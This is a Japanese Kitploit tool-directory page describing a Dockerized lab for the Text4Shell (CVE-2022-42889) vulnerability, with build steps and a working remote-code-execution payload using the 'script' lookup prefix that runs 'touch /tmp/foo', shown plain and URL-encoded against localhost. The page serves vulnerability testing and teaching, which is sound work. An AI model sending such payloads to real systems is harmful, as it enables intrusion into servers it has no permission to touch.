Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
cve-2022-42889-text4shell-docker — CVE-2022-42889 (Text4Shell) RCE脆弱性をテストするためのDocker化されたラボ環境。script、DNS、URLルックアッププレフィックスを使用したステップバイステップの悪用手順付き。 | Kitploit
ツール/GitHubGitHub/reachabilityorg/cve-2022-42889-text4shell-docker
コンテナセキュリティ脆弱性分析エクスプロイトウェブアプリケーション悪用学習と教育ラボと実践
GitHubreachabilityorg/cve-2022-42889-text4shell-docker

cve-2022-42889-text4shell-docker

CVE-2022-42889 (Text4Shell) RCE脆弱性をテストするためのDocker化されたラボ環境。script、DNS、URLルックアッププレフィックスを使用したステップバイステップの悪用手順付き。

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
リポジトリを見る
8ヶ月前未レビュー

Mavenのインストール - maven-linux


  1. Mavenをインストールしてfat jarを作成する
root@kitploit:~
mvn clean install
  1. Dockerビルド
root@kitploit:~
docker build --tag=text4shell .
  1. Docker実行
root@kitploit:~
docker run -p 80:8080 text4shell
  1. アプリをテストする
root@kitploit:~
http://localhost/text4shell/attack?search=<anything>
  1. 攻撃は、前述のルックアップであるプレフィックスを使用して文字列「${prefix:name}」を渡すことで実行できます:
root@kitploit:~
${script:javascript:java.lang.Runtime.getRuntime().exec('touch /tmp/foo')}

http://localhost/text4shell/attack?search=%24%7Bscript%3Ajavascript%3Ajava.lang.Runtime.getRuntime%28%29.exec%28%27touch%20%2Ftmp%2Ffoo%27%29%7D

  1. dns または url プレフィックスを使用してみることもできます。

  2. コンテナIDを取得する

root@kitploit:~
docker container ls
  1. アプリの中に入る
root@kitploit:~
docker exec -it <container_id> bash
  1. 上記のRCEが成功したか確認するには(/tmpディレクトリにfooというファイルが作成されているはずです):
root@kitploit:~
ls /tmp/
  1. コンテナを停止する
root@kitploit:~
docker container stop <container_id>
ツールをダウンロード